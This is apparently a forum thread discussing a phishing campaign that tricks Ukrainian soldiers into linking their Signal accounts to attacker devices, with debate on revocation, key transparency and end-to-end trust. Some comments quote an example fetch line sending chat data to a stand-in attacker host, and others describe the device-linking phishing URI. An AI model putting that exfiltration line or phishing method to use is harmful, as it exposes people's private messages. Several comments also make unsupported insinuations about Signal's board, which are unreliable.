I'm only surprised it took this long for an in-the-wild attack to appear in open literature.
It certainly doesn't help that Signal themselves have discounted this attack (quoting from the IACR ePrint paper):
"We disclosed our findings to the Signal organization on October 20, 2020, and received an answer on October 28, 2020. In summary, they state that they do not treat a compromise of long-term secrets as part of their adversarial model"
If I'm reading that right, the attack assumes the attacker has (among other things) a private key (IK) stored only on the user's device, and the user's password.
Thus, carrying out this attack would seem to require hardware access to one of the victim's devices (or some other backdoor), in which case you've already lost.
Correct me if I'm wrong, but that doesn't seem particularly dangerous to me? As always, security of your physical hardware (and not falling for phishing attacks) is paramount.
No, it means that if you approve a device to link, and you later have reason to unlink the device, you can't establish absolutely that the unlinked device can no longer access messages, or decrypt messages involving an account, breaking the forward-secrecy guarantees.
That leaves burning the whole account as the only remedy for a Signal account that has accepted a link to a 'bad device' (maybe rotating safety numbers/keys would be sufficient; I am uncertain there). If you can prove the malicious link was only a link, then yeah, the attack I described is incomplete, but the general issues with linked devices, and the remedies described, are the important bits, I think.
That's not what the attack does, though - they have access to your private key, so they can complete the linking protocol without your phone and add as many devices as they want (up to the allowed limit). If you add a bad device, you are screwed from that moment on, assuming you don't sync your chat history.
You can always see how many devices a user has: each has a unique integer id, so if I want to send you a message, I generate a new encrypted version for each device. If the UI does not show your devices properly, then that is an oversight for sure, but I don't think that's the case anymore.
Either way, you'd have to trust that the Signal server is honest and tells you about all your devices. To avoid that, you need proofs that every Signal user has the same view of your account (keys), which is why key transparency is such an important feature.
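To make the fan-out concrete, here's a toy sketch of the idea described above: one ciphertext per registered device id. Everything is made up for illustration - the XOR keystream stands in for the real Double Ratchet session ciphertext, and the device ids/keys are hypothetical, not Signal's actual API.

```python
import hashlib

def toy_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Stand-in for a real AEAD: XOR against a SHA-256-derived keystream.
    NOT secure -- it only illustrates that each device gets its own ciphertext."""
    stream = b""
    counter = 0
    while len(stream) < len(plaintext):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(p ^ s for p, s in zip(plaintext, stream))

def fan_out(message: bytes, device_keys: dict) -> dict:
    """The sender encrypts separately for every device id registered
    under the recipient's account, as queried from the server."""
    return {dev_id: toy_encrypt(key, message) for dev_id, key in device_keys.items()}

# Hypothetical device list fetched from the server: integer id -> session key.
devices = {1: b"phone-session-key", 2: b"desktop-session-key"}
envelopes = fan_out(b"hello", devices)

# The toy cipher is symmetric, so applying it again decrypts;
# each device can only open its own copy.
assert toy_encrypt(devices[2], envelopes[2]) == b"hello"
assert envelopes[1] != envelopes[2]
```

The upshot: because the sender enumerates devices at send time, a hidden extra device is only possible if the server lies about the device list - which is exactly the gap key transparency is meant to close.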
It sounds like all that's needed is a device that had been linked in the past. Unlinking doesn't have the security requirements you'd think it would and there's a phishing attack to make scanning a QR code trigger a device link (which seems really really bad if the user doesn't even have to take much action)
Your phone (primary device) and the linked ones have to share the IK since that is the "root of trust" for your account: with it you generate new device keys, renew them, and so on.
Those keys are backed by the Keystore on Android, and by similar systems on Windows/Linux; I'd assume the same for macOS/iOS (but I don't know the details). So it's not as simple as just having access to your laptop - they'd need at least root.
Phishing is always tricky, probably impossible to counter sadly - each one of us would be susceptible at the wrong moment.
I think the point is that as a user you expect revocation of trust to protect you going forward, yet it doesn't (e.g. the server shouldn't be forwarding new messages to a revoked device). That's a design decision Signal made, but clearly it's one that leaves you open to harm. Moreover, it's a dangerous decision because after obtaining the IK in some way (e.g. from a stolen device) you're able to essentially take over the account surreptitiously, without the user ever knowing (i.e. no phishing needed). As an end user these are surprising design choices, and the fact that Signal discounted this as not part of their threat model suggests to me that their threat model has an intentional or unintentional hole; second-hand devices that aren't wiped are common, and jailbreaks exist.
This isn’t intractable either. You could imagine various protocols where having the IK is insufficient for receiving new messages going forward or impersonating sending messages. A simple one would be that each new device establishes a new key that the server recognizes as pertaining to that device and notifications are encrypted with a per-device key when sending to a device and require outbound messages to be similarly encrypted. There’s probably better schemes than this naive approach.
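A toy model of that naive scheme, under the stated assumptions (all class and key names here are invented, not anything Signal actually implements): the server only wraps new messages for currently-registered per-device keys, so unlinking a device cuts it off from future traffic. Note this sketch only illustrates the revocation half; stopping an IK holder from simply re-linking a new device would need more machinery.

```python
import hashlib

def toy_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # Toy symmetric XOR-keystream cipher standing in for real
    # per-device encryption; applying it twice decrypts.
    stream = b""
    counter = 0
    while len(stream) < len(plaintext):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(p ^ s for p, s in zip(plaintext, stream))

class Server:
    """Tracks only live per-device keys; the long-term IK never appears here,
    so possessing the IK alone does not decrypt new traffic."""
    def __init__(self):
        self.device_keys = {}

    def link(self, device_id, device_key):
        self.device_keys[device_id] = device_key

    def unlink(self, device_id):
        self.device_keys.pop(device_id, None)

    def deliver(self, message):
        # New messages are wrapped only for devices that are still linked.
        return {d: toy_encrypt(k, message) for d, k in self.device_keys.items()}

server = Server()
server.link("phone", b"phone-key")
server.link("stolen-laptop", b"laptop-key")
server.unlink("stolen-laptop")

inbox = server.deliver(b"new message")
assert "stolen-laptop" not in inbox        # revoked device receives nothing new
assert toy_encrypt(b"phone-key", inbox["phone"]) == b"new message"
```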
Revocation of trust is always a tricky issue, you can look at TLS certificates to see what a can of worms that is.
The Signal server does not forward messages to your devices, and the list of devices someone has (including your own) can and has to be queried in order to communicate with them, since each device establishes unique keys signed by that IK - so it isn't as bad as having invisible devices you'd never be aware of. That of course relies on you being able to ensure the server is honest and consistent, but that is work they already have in progress.
I think most of the issue here doesn't lie in the protocol design but in (1) how you "detect" the failure scenarios (like here, if your phone is informed a new device was added, without you pressing the Link button, you can assume something's phishy), (2) how do you properly warn people when something bad happens and (3) how do you inform users such that you both have a similar mental model. You also have to achieve these things without overwhelming them.
I would be surprised if there aren’t ways to design it cryptographically so that an unlinked device doesn’t have access to future messages. The problem with how Signal has designed it is that it is a known weakness, one that Signal has dismissed in the past.
“Just install this chrome browser extension” is all it takes now. Hell, you can even access cookies and previously visited sites from within the browser. All it takes is some funky ad, or chrome extension, or some llama-powered toolbar to gain access to be able to do exactly that.
Background services on devices have been a thing for a while too. Install an app (granting all the permissions it asks for) and bam: a self-restarting daemon service tracking your location, search history, photos, contacts, notes, email, etc.
The attack in that paper assumes you have compromised the user's long term private identity key (IK) which is used to derive all the other keys in the signal protocol.
Outside of lab settings, the only way to do that is:
- (1) you get root access to the user's device
- (2) you compromise a recent chat backup
The campaign Google found is akin to phishing, so not as problematic on a technical level. How you warn someone they might be doing something dangerous is an entire can of worms in Usable Security... but it's going to become even more relevant for Signal once adding a new linked device also copies your message history (and the last 45 days of attachments).
About the paper: if someone has gotten access to your identity (private) key, you are compromised, either with their attack (adding a linked device) or just getting MitM'ed and all messages decrypted. The attacker won.
The attack presented by Google is just classical phishing. In this case, if linked devices are disabled or don't exist, sure, you're safe. But if the underlying attack has a different premise (for example, "You need to update to this Signal apk here"), it could still work.
One thing I'm realizing more and more (I've been building an encrypted AI chat service powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean, at the end of the day you can put a one-line fetch/analytics tracker/etc. on the rendering side and everything your protocol claimed to do becomes useless. That even extends to the OS that the rendering is done on.
The last bit adds an interesting facet: even if you manage to open source the client and make it verifiably buildable by the user, you still need to distribute it on the iOS App Store. Anything can happen in the publish process. I use iOS as the example because it's particularly tricky to load your own build of an application.
And then if you did that, you'd still need to do it all on the other side of the chat too, assuming it's a multi-party chat.
You can have every cute protocol known to man, the best encryption algorithms on the wire, etc., but at the end of the day it's all trust.
I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.
Sometimes it all feels pointless (besides encrypted storage).
I also feel weird that the bulk of the discussion is on the hypothetical validity of a security protocol, usually focused on the maths, when all of that can be subverted with a fetch("https://malevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicon, through the OS, all the way to how packets are forwarded from you to the person on the other end.
This makes that entire goal moot; eliminating trust thus seems impossible, you're just shifting around the things you're willing to trust, or hide them behind an abstraction.
I think what will become more important is having enough mechanisms to categorically prove that an entity you trust to a certain extent is acting maliciously, and to hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a loud enough loudspeaker to point out distrust.
A few examples:
- certificate transparency logs so your traffic is not MitM'ed
- reproducible builds, so the binary you get matches the public open source code you expect it to (regardless of its quality)
- key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's
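The mechanisms in that list share one detection idea: every observer must see the same append-only log, so a server equivocating about certificates or keys produces diverging views that clients can catch by gossiping. A toy sketch (real CT and key transparency logs use Merkle trees with inclusion/consistency proofs; this hash chain is a simplification, and the entries are invented):

```python
import hashlib

class ToyTransparencyLog:
    """Append-only log summarized by a running hash of its entries.
    If two clients ever hold different heads for the 'same' log,
    the operator has shown them different histories."""
    def __init__(self):
        self.head = b"\x00" * 32

    def append(self, entry: bytes):
        self.head = hashlib.sha256(self.head + entry).digest()

honest, equivocating = ToyTransparencyLog(), ToyTransparencyLog()
for log in (honest, equivocating):
    log.append(b"alice-device-1:pubkey-A")

# A dishonest server shows one client an extra, attacker-controlled device...
equivocating.append(b"alice-device-2:pubkey-EVE")

# ...but as soon as two clients compare log heads, the split view is visible.
assert honest.head != equivocating.head
```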
I agree. Perhaps it's why I find discussions like nonce lengths and randomness sources almost insane (in the sense of willfully missing the forest for the trees). Intelligence agencies have managed to penetrate the most secretive and powerful organizations known to man. Why would one think Signal's supply chain is impervious? I'd assume the opposite.
But depending on your threat model, it can still be useful. If a state actor has a backdoor into something, would they burn that capability to get you? If you are a dissident in a totalitarian government, you would expect them to throw everything at you and not tell anyone how/why. If you are engaged in terrorism and could be tried in a “classified” setting, you would expect them to throw everything at you. If you are Jane Average passing nudes and talking about doing a little Molly last weekend and would have a lawyer go through discovery, you are probably safe.
I don't think they are insane, they are quite useful when designing security mechanisms, while at the same time being utter noise for the end-user benefiting from that system.
> If you're building a chip to generate prime numbers, I surely hope you know how to select randomness and how to write constant-time, branch-free algorithms, just like an engineer designing elevators had better know what the tensile strength of the cable should be. In either case, it's mumbo jumbo for me, and I just need to get on with my day.
Part of what muddies the water is our collective inability to separate the two contexts, or empower tech communicators to do it. If we keep making new tech akin to esoteric magic, no one will board the elevator.
I almost find it worse. Using your analogy, it's akin to running atomic-level simulations of the elevator cable's quality while the elevator car is missing its floor.
I agree with you that the cart seems to be moving ahead of the horse, in that there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that attempt to be too secure will prevent users from reading their own messages and hence will induce those users to use "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently missed messages.)
There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.
I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.
At a casual glance, any E2EE system can be reduced to your ironclad legally guaranteed (ILG) system by having the platform keep a copy of the key(s), for instance. So it doesn't have to be a one-or-the-other choice.
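A sketch of that reduction, under the parent's framing (all names here are invented for illustration): a single extra line of key escrow turns an otherwise end-to-end system into the "ironclad legal guarantee" kind, where the platform can decrypt under legal process.

```python
import hashlib

def toy_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # Toy symmetric XOR-keystream cipher (encrypting twice decrypts).
    # Stand-in for the real E2EE message encryption; NOT secure.
    stream = b""
    counter = 0
    while len(stream) < len(plaintext):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(p ^ s for p, s in zip(plaintext, stream))

class PlatformWithEscrow:
    def __init__(self):
        self.escrow = {}

    def register(self, user, key):
        # The one line that reduces E2EE to an ILG system:
        # the platform keeps a copy of the key.
        self.escrow[user] = key

    def compelled_read(self, user, ciphertext):
        # Exercised only under whatever legal process the guarantee specifies.
        return toy_encrypt(self.escrow[user], ciphertext)

platform = PlatformWithEscrow()
platform.register("alice", b"alice-key")
ct = toy_encrypt(b"alice-key", b"meet at noon")   # "end-to-end" encrypted on the wire
assert platform.compelled_read("alice", ct) == b"meet at noon"
```

Which is exactly why it isn't a one-or-the-other choice: the technical layer stays the same, and the difference is purely who else holds key material and under what rules.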
Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).
> I also feel weird that the bulk of the discussion is on the hypothetical validity of a security protocol, usually focused on the maths, when all of that can be subverted with a fetch("https://malevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.
> I also feel weird that the bulk of the discussion is on the hypothetical validity of a security protocol, usually focused on the maths, when all of that can be subverted with a fetch("https://malevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
I think your comment in general, and this part in particular, forgets what the state of telecommunications was 10-15 years ago. Nothing was encrypted. Doing anything on a public wifi was playing Russian roulette, and signals intelligence agencies were having the time of their lives.
The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.
I think that part of what you are talking about is sometimes called "attestation". Basically a signature, with a root that you trust, that confirms beyond doubt the provenance of the entity (phone + OS + app) that you interact with.
Android has this and can confirm to a third party that the phone is running, for example, a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone running, say, LineageOS as "original" software.
The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.
A fully transparent attested artifact, which doesn't involve blind trust in an entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of a root of trust based on signatures.
All of the above are technically possible, but not implemented today in such a way to make this feasible. I'm confident that with enough interest this will be eventually implemented.
I'll be feeling pessimistic like this, and then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.
With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."
> "E2E encryption" really requires the client to be built and verified by the end user
But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.
At the end of the day you have to put your trust somewhere, otherwise you can never communicate.
It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.
Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.
tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.
> tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.
This is sorta my point, lots of DC folks use Signal under the assumption they're protected from government snooping. Sometimes I feel like it could well have the opposite effect (via the selection bias of Signal users).
It is not plainly stated in the article, but as far as I understand, the first step of one of the attacks is to take the smartphone off a dead soldier’s body.
The article says they phish people into linking adversarial devices to their Signal:
> [...] threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, [...]
It raises questions about smartphones being standard equipment for soldiers, but they do give every soldier an effective, powerful computing and communication platform (that they know without additional training).
The question is how to secure them, including against the risk described in the parent. That seems like a high risk to me; I would expect someone is working on securing them well enough that even Russian intelligence doesn't have an effective exploit.
The solutions may apply well to civilian privacy too, if they ever become more widespread. It wouldn't be the worst idea to secure Ukrainian civilian phones against Russian attackers.
> Encrypted milspec comms aren’t the standard in a massive war.
It is standard in any modern military that is actually prepared for war. It's not like encrypted digital radio is some kind of fancy tech, either - it's readily available to civilians.
Ukraine in particular started working on a wholesale switch to encrypted Motorola radios shortly after the war began in 2014, and by now it's standard equipment across their forces. Russia, OTOH, started the war without a good solution, with patchwork of ad hoc solutions originating from enthusiasts in the units - e.g. https://en.wikipedia.org/wiki/Andrey_Morozov was a vocal proponent.
But smartphones are more than communications. You can also use them as artillery computers for firing solutions, for example. And while normally there would be a milspec solution for this purpose, those are usually designed with milspec artillery systems and munitions in mind, while both sides in this war are heavily reliant on stocks that are non-standard (to them) - Ukraine, obviously, with all the Western aid, but Russia also had to dig out a lot of old equipment that was not adequately handled. Apps are much easier to update for this purpose, so they're heavily used in practice (and, again, these are often grassroots developments, not something pushed top-down by brass).
Russians apparently aren't allowed to bring phones to the front lines, but Ukrainians often still do, as they have the combat-management app that is critical to operations. I've always wondered if this is why there's far more published Ukrainian combat footage than Russian, beyond the donation incentive attached to videos published on YouTube/Telegram.
> I've always wondered if this is why there's far more published Ukrainian combat footage than Russian.
I'm sure Russia's meat wave tactics have more of a role. If you're sending your troops on suicide missions, including guys without weapons and even on crutches, you're not exactly keen on having them carry mobile phones to document the experience or even, heaven forbid, survive by surrendering.
Are you sure it's a meme, though? There is plenty of footage out there, documenting meat wave tactics in 4k. Have you been living under a rock?
> Again, if Ukrainians are being beaten by guys on crutches (...)
What's your definition of "being beaten"? Three years into Russia's 3-day invasion of Ukraine and Ukraine started invading and occupying Russian territory. Is this your definition of being beaten?
I think a large chunk of the footage is taken by gopros or similar, not smartphones.
And I think pretty much all published Ukrainian and Russian combat footage is vetted by their respective militaries (who would want to be court-martialed for Reddit karma?).
They just take different approaches to what, when, and where to release the footage.
A radio on a soldier is already a dangerous communications device - with a radio you can call in artillery strikes, for example.
There's no particular need IMO to secure smartphones on the battlefield in any way beyond standard countermeasures - i.e. encrypt the storage and use a passcode unlock.
That's referring to people literally posting selfies online (with the result of giving away their location by either metadata or geo-guessing).
Which is a process-and-procedure issue more than a security issue with the phones themselves (except insofar as it makes really obvious the need for a battlefield-device OS that strips all that stuff out by default).
Is this suggesting that a single QR scan can on its own perform the device linking? If so, it seems like that's kind of the hole here, right? Like you shouldn't be able to scan a code that on its own links the device; you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
> you should have to manually confirm with like "Yes I want to link to this device". And then if you thought you were scanning a group invite code you'd realize you weren't. (Yeah, you'd still have to realize that, but I think it's a meaningful step up over just "you scanned a code to join a group and instead it silently linked a different device".)
Remember that Signal is designed for non-technical users. Many/most do not understand QR codes, links, linking, etc, and they do not think much about it. They take an immediate, instinctive guess and click on something - often to get it off the screen so they can go back to what they were doing.
Do you have reason to think there is not confirmation? Maybe Signal's documentation will tell you.
> Do you have reason to think there is not confirmation?
The reason is just that in the article it says:
> threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance
That phrasing suggests to me that the scanning of the QR code, on its own, performs the linking. That may not be the case, but if so I'd say the wording is misleading or at least imprecise.
In fairness, I think it's misleading to you due to the details you are interested in. They don't say otherwise and they can't lay out every detail that anyone might be interested in; it's not an RFC.
Not the person you replied to, but I just tried googling half a dozen different terms and got results that have nothing to do with Signal.
> Remember that Signal is designed for non-technical users.
That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and to send messages from your identity. Are you sure you want to do that?" And the button says "link devices", not "yes" or "no".
I think the frustration here is that Signal petulantly and paternalistically refuses to allow you to fully sync to another device (and for years refused to even allow you to back up messages) because supposedly we can't be trusted with such a thing...but then they leave the QR code system so idiotically designed it's apparently trivial to phish people into linking their devices to malicious actors?
Why the fuck does scanning a QR code, without having first selected "link device", even open that dialog? Or require a PIN code they obsessively force us to re-enter all the time?
It's obviously ripe for abuse.
We admonish people for piping a remote document into their shell but a QR code that links devices with one click is OK?
> That does not prevent them from putting up a warning message that says "You just scanned a code which will allow another device to read all future messages sent to you, and to send messages from your identity. Are you sure you want to do that?" And the button says "link devices", not "yes" or "no".
As an experiment, I just linked a device to my Signal account. After clicking "Link new device" in Signal, and then scanning the QR code, a dialog popped up: "Link this device? This device will be able to see your groups and contacts, access your chats, and send messages in your name. [Cancel] [Link new device]"
If I scan the QR code with Google Lens instead, it reads and displays the sgnl://linkdevice... URL but does not launch (or offer to launch) Signal.
There are many voices which try to tell you that signal is compromised. Notice that all of those voices have less open-source-ness than Signal in virtually all cases.
Signal is doing its best to be a web scale company and also defend human rights. Individual dignity matters.
> There are many voices which try to tell you that signal is compromised.
But compromised by whom? Russian or US intelligence? I am really confused.
I just took a quick look at the Signal Foundation website and its board members, and I read things like:
> Maher is a term member of the Council on Foreign Relations, a World Economic Forum Young Global Leader, and a security fellow at the Truman National Security Project.
> She is an appointed member of the U.S. Department of State's Foreign Affairs Policy Board
> She received her Bachelor's degree in Middle Eastern and Islamic Studies in 2005 from New York University's College of Arts and Science, after studying at the Arabic Language Institute of the American University in Cairo, Egypt, and Institut français d'études arabes de Damas (L'IFEAD) in Damascus, Syria.
People like that sound like part of the intelligence world to me. What exactly are they doing on the board of Signal (an open source messaging app)?
And Telegram is specifically bad here: it uses custom crypto on a custom protocol, has no E2EE by default whatsoever, and stores everything on the server in plain text.
Also, it's a tricky environment of disinformation generally, and in particular for anything valuable like Signal. If Signal is secure, attackers on privacy would want people to believe Signal is compromised and to use something else. If it's not, then they would want people to believe Signal is secure.
I think the solution is to completely ignore any potential disinfo source, especially random people on social media (including HN). It's hard to do when that's where the social center is - you have to exclude yourself. Restrict yourself to legitimate, trusted voices.
I would also read it from another perspective. Attackers, especially at the level of nation states, will always try to get as many avenues for achieving their goals as possible.
If you have compromised a service, it would be in your interest to make it more popular (assuming you think you are the only one in possession of it).
If you cannot, you don't give up; you just go back to the drawing board (https://xkcd.com/538/). Maybe I don't need to break Signal if I can just rely on phishing or scare tactics to get what I want.
I wonder if Signal should expose linked devices directly in the UI at all times. Something like a small icon that indicates "You have 3 linked devices active" or similar.
Showing a big snackbar when a new device is added is probably enough, especially if the app can detect there was no "action" on your phone that triggered it.
Key transparency, once rolled out, would help to ensure there is no lingering "bad" device around, but phishing will always be a problem.
Snackbar isn't a particularly new term, it goes back, IIRC, to the first version of Material Design and is similar to a toast but different in that snackbars may support interaction whereas toasts are non-interactive.
I think the trouble is information overload is a bit of a thing in this case. It's information that is 99% of the time useless, except the one time it isn't. But also, to an informed user is much less of a threat - the threat is anyone you interact with getting compromised.
EDIT: Like an analytics based approach would probably be far more useful - popping up a confirmation for example if GeoIP shows a device is far removed from all the others, which for most people would be true unless they were traveling.
They provided some domains, but not all of them are taken. For example, signal-protect[.]host is available, kropyva[.]site is available, signal-confirm[.]site is registered in Ukraine. Some of them are registered in Russia.
Never trust a country at war—any side. Party A blames B, Party B blames A, but both have their own agenda.
WHOIS data is usually fake, made-up information, so I don't know why you're using it to claim the domain is registered in Ukraine. Russia is also known to use stolen credentials, SIM cards, etc. from its neighbouring countries, including Ukraine, for things like this.
Then why should I trust the article at all? If WHOIS data is fake and stolen credentials are common (which I don't disagree with), I could register a domain, put your name on it, and make it look like you're behind the phishing. Would that make it true? After all, in war, deception is a legitimate tactic.
I believe you are making a mistake by thinking that since a malicious actor's domain is registered in Ukraine, it automatically must be doing something in the interests of Ukraine, or at least be known to its officials.
Lots of Russian state actors have no problems working from within Ukraine, alas. Add to this purely chaotic criminal actors who will go with the highest bidder, territories temporarily controlled by Russians that have people shuttle to Ukraine and back daily, and it becomes complicated very quickly.
Fair point. Just because a domain is registered in Ukraine doesn't mean it's acting in Ukraine's interests. But that works both ways. If Russian actors can operate from Ukraine, then Ukrainian actors (or others) can also operate from Russia, or at least make it look that way. Cyber attacks originating from Ukraine and targeting Russia aren't uncommon either, which only adds to the complexity of attribution.
The issue isn't just attribution but also affiliation. When similar attacks come from Ukraine targeting Russia, Google stays quiet. I understand that Russia invaded Ukraine, not the other way around, but given the complexity of the conflict, aligning with one side in cyber warfare reporting is a questionable move. At the end of the day, attacks will come from both sides - it's a war, after all.
Edit: when I say 'questionable move', I'm specifically referring to Google. It's unclear what they were trying to achieve with this article, is it a political statement or just a marketing piece showcasing how good GTIG is? Or both?
Ukrainian military are moving from Telegram, which presumably still has some ties to Russia despite the claims. And this is yet another phishing campaign in Ukrainian language that makes use of Ukrainian-registered domains to host fake Signal group invites to make Ukrainian military join and link their devices to an adversary-controlled machine. Who might be behind that attack? Hmm, let me think... I don't know! Probably Ukrainians themselves. Or it might be the US. Might as well be the Martians. We will never know the real truth, after all nobody is to be trusted during the war!
Stop the tiresome FUD please. This war is surprisingly straightforward by the standards of the last century, it's literally out of some decades-old textbook. Let's not drag this discussion here again. If you have specific issues with Google's attribution here, please state them, HN is pretty aware that attribution can be shaky. My only gripe with the article is the clickbait title: nobody says that someone is "targeting e-mail" about e-mail phishing.
> In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792.
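The `sgnl://linkdevice?uuid=` URI scheme is the one quoted in the article; here's a hedged sketch of how a defensive client or proxy might classify such URIs before handing them off to the app (the function name and categories are made up):

```python
from urllib.parse import urlparse, parse_qs

def classify_signal_uri(uri):
    """Distinguish a device-linking URI from everything else, so a
    warning can be shown before the OS dispatches it to Signal."""
    parsed = urlparse(uri)
    if parsed.scheme != "sgnl":
        return "not-signal"
    if parsed.netloc == "linkdevice":
        # The phishing pages swap the group-invite redirect for this URI.
        return "link-device" if "uuid" in parse_qs(parsed.query) else "malformed-link"
    return "other"
```

The point is that a genuine group invite never needs to trigger device linking, so the two flows are trivially distinguishable at the URI level.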
> Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.
Ironic, coming from Google, as Android is THE only OS where using alphanumeric passwords is nearly impossible: Android caps password length at an arbitrary 16 characters, preventing the use of passphrases.
Am I reading this right? You can initiate device linking in Signal by clicking on an external URL? This is so stupid, I don't even have words for this. In a security-focused app you should not be able to link anything, without manually going into the devices/link menu and clicking "link new device".
If the victim's phone provider can somehow be compromised or coerced into cooperating, a government actor can intercept the text message Signal and others use for verification and set up the victim's account on a new device.
It's very easily done if the victim is located in an authoritarian country like Russia or Iran: they can simply force the local phone provider to cooperate.
> government actor can intercept the text message Signal and others use for verification and set up the victims account on a new device
Yes, but if they only control the phone number, they will register a new account (with different cryptographic keys) for you, which is why everyone previously chatting with you will get that "Your Safety Number with Bob changed" message.
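A toy illustration of why re-registration is visible: the safety number is derived from both parties' identity keys, so fresh keys produce a different number. (This stand-in just hashes the two public keys; the real scheme iterates a hash many times and encodes the result as digit groups.)

```python
import hashlib

def safety_number(id_key_a: bytes, id_key_b: bytes) -> str:
    """Toy stand-in for Signal's safety number: a short fingerprint
    over both parties' public identity keys, order-independent."""
    digest = hashlib.sha256(b"".join(sorted((id_key_a, id_key_b)))).hexdigest()
    return digest[:12]

old = safety_number(b"alice-key-1", b"bob-key-1")
# Attacker re-registers Bob's number, generating fresh keys:
new = safety_number(b"alice-key-1", b"bob-key-2")
assert old != new  # every contact of Bob's sees "Safety Number changed"
```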
tldr: they mostly use phishing with fake Ukrainian army group invites to trick people (from the Ukrainian army) into linking their phone to an attacker-controlled PC.
They also try to exfiltrate the actual SQL database files from Windows and Android devices.
The only people who think it is bad are people who have a different opinion and feel attacked for whatever reason. I find it telling when people accuse others of virtue signaling, because it is almost always someone who is jealous or insecure attacking said signaler.
"Virtue signaling" in theory means "talking the talk without walking the walk", but it's generally thrown out by people who make no effort to assess whether the person criticized is walking the walk or even in contradiction of such evidence.
Driving an economically efficient car -- choosing any sort of car -- has enormous consequences on one's life, for example. Choosing to buy a particular car isn't a decision made lightly. But Prius drivers back in the day were accused of virtue signaling, as though the Prius were equivalent to a temporary tattoo.
In fact, speaking of temporary tattoos, simply having a bumper sticker advocating for animal rights, say, belief in anthropogenic climate change, or peace in the Middle East will expose one to regular displays of hostility and aggression, so it isn't a cheap signal.
In other words, in my experience your observation is spot on.
> "Virtue signaling" in theory means "talking the talk without walking the walk"
Virtue signaling means sending deliberate signals about your virtues, whether you "walk the walk" or not. People are often critiqued for going to uncomfortable lengths to signal their virtues, but something as simple as a "meat is murder" shirt or a MAGA hat is also virtue signaling.
How do you tell that to them in the first place? You've got someone's phone number. The person who gives it to you tells you that they use WhatsApp. You can't even tell them "Sorry, I only use Signal" unless you open the WhatsApp app.
You realise you could use that phone number to...call them and let them know? Also - in what situation are they giving you a phone number and telling you they use WhatsApp but you having no way to respond when receiving that info? If it's in person you can explain at the time. If it's taken from a website, call them. Or you can even fall back on SMS.
Presumably at the time they've given you their phone number, they've told you that they are on WhatsApp, and then you've responded directly that you're only on Signal.
If there is a communications channel by which they can give you their phone number, you can use that same channel to discuss what messenger to use.
Take time with the people to do the boring stuff on their phone/computer:
- install [the thing]
- start it, show how it works
- search for yourself, start a convo, exchange messages
- add them to the group
IME the friction comes from the first step, because it's really an annoyance no one cares about; if you take it on yourself and do it for them, they'll appreciate that.
